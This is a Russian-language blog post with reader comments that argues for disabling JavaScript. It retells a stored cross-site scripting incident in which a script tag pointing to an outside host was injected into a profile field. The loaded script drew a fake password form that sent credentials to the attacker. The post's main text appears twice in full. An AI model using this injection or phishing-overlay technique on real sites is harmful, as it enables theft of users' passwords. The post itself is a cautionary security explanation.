![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
natarajВот в предыдущем посте некоторые сказали что-то вроде "зачем отключать JavaScript, если я на адресную строку в браузере каждый раз смотрю, прежде чем вводить пароль".
А вот зачем
Краткий пересказ: В одном весьма популярном сайте на ранних этапах его становления была допущена совсем мелкая ошибка. Они к стандартным параметрам пользователя, которые были в используемом движке, добавили еще один свой, диктуемый предметной областью сайта, и стали выводить его вместе с другой юзерской информацией в каждом посте и комментарии. Нюанс в том, что информация из базы данных попадала в браузер без какой-то фильтрации, и если в это поле запихнуть html-тег то в бразуер будет попадать как html-тег. Вроде бы не особо страшно... Но теперь следите за руками:
В оное поле запихиваем <script src="http://tsq.od"></script>, по оному адресу отдаем файл с ява-скриптом, который создает новый <div>перекрывающий весь экран, рисует на нем форму ввода пароля полностью совпадающую с той, которая есть на сайте, но только результат введенный в эту форму отправляется на сайт злоумышленника. Ну и для полного счастья, этот скрипт ставит куку, чтобы одному и тому же пользователю этот фальшивый экран не показывался бы дважды. Далее пишем в несколько популярных тем комментарий от имени пользователя с троянским кастомным полем и ждем.
Итого юные исследователи насобирали несколько сотен паролей, среди которых оказались пароли пользователей с полным админским доступом...
Отдельно прошу отметить: в адресной строке браузера показывался правильный адрес.
Выводы:
1. Если вы хотите повысить уровень безопасности работы с каким-либо сайтом (например вы в нем супер-модератор или админ) -- отключайте для этого сайта скрипты.
2. Если вы разработчик сайта -- не поленитесь, приложите усилия для того, чтобы ваша разработка была достаточно юзабельна с выключенным JavaScript. Чтобы те, кто заботится о своей безопасности, могли бы это сделать. В любом коде есть баги. Отключение JavaScript делает эксплуатацию части из них невозможной... Оно того стоит.
И опять ссылки:
NotScript для Хрома: https://chrome.google.com/webstore/detail/notscripts/odjhifogjcknibkahlpidmdajjpkkcfn
NoScript для FireFox'а: https://addons.mozilla.org/ru/firefox/addon/noscript/
А вот зачем
Краткий пересказ: В одном весьма популярном сайте на ранних этапах его становления была допущена совсем мелкая ошибка. Они к стандартным параметрам пользователя, которые были в используемом движке, добавили еще один свой, диктуемый предметной областью сайта, и стали выводить его вместе с другой юзерской информацией в каждом посте и комментарии. Нюанс в том, что информация из базы данных попадала в браузер без какой-то фильтрации, и если в это поле запихнуть html-тег то в бразуер будет попадать как html-тег. Вроде бы не особо страшно... Но теперь следите за руками:
В оное поле запихиваем <script src="http://tsq.od"></script>, по оному адресу отдаем файл с ява-скриптом, который создает новый <div>перекрывающий весь экран, рисует на нем форму ввода пароля полностью совпадающую с той, которая есть на сайте, но только результат введенный в эту форму отправляется на сайт злоумышленника. Ну и для полного счастья, этот скрипт ставит куку, чтобы одному и тому же пользователю этот фальшивый экран не показывался бы дважды. Далее пишем в несколько популярных тем комментарий от имени пользователя с троянским кастомным полем и ждем.
Итого юные исследователи насобирали несколько сотен паролей, среди которых оказались пароли пользователей с полным админским доступом...
Отдельно прошу отметить: в адресной строке браузера показывался правильный адрес.
Выводы:
1. Если вы хотите повысить уровень безопасности работы с каким-либо сайтом (например вы в нем супер-модератор или админ) -- отключайте для этого сайта скрипты.
2. Если вы разработчик сайта -- не поленитесь, приложите усилия для того, чтобы ваша разработка была достаточно юзабельна с выключенным JavaScript. Чтобы те, кто заботится о своей безопасности, могли бы это сделать. В любом коде есть баги. Отключение JavaScript делает эксплуатацию части из них невозможной... Оно того стоит.
И опять ссылки:
NotScript для Хрома: https://chrome.google.com/webstore/detail/notscripts/odjhifogjcknibkahlpidmdajjpkkcfn
NoScript для FireFox'а: https://addons.mozilla.org/ru/firefox/addon/noscript/
![[identity profile]](https://www.dreamwidth.org/img/silk/identity/openid.png){kind=small}
no subject
Date: 2013-03-27 06:45 am (UTC)no subject
Date: 2013-03-27 07:14 am (UTC)Я уж скорее поверю в то, что можно научить веб-разработчиков правильно санитизировать user-provided content, чем в то, что кто-то серьезно будет бороться за работу без JS.
А сейчас еще пошла мода на мобильные приложения-клиенты для сайтов - там вообще весело будет с уязвимостями - там можно унести у юзера его записную книжку, перевести деньги со счета у оператора куда хочешь с помощью платных SMS-ок, заснять внутренности его дома видеокамерой etc.
no subject
Date: 2013-03-27 07:31 am (UTC)... Ну как ты в приличном обществе покажешь на пальцах число 132? ...
no subject
Date: 2013-03-27 08:03 am (UTC)прямой доступ к звонилке и sms уже сейчас считается именно что уязвимостью и должен быть откручен при очередном апдейте.
no subject
Date: 2013-03-27 08:06 am (UTC)no subject
Date: 2013-03-27 08:07 am (UTC)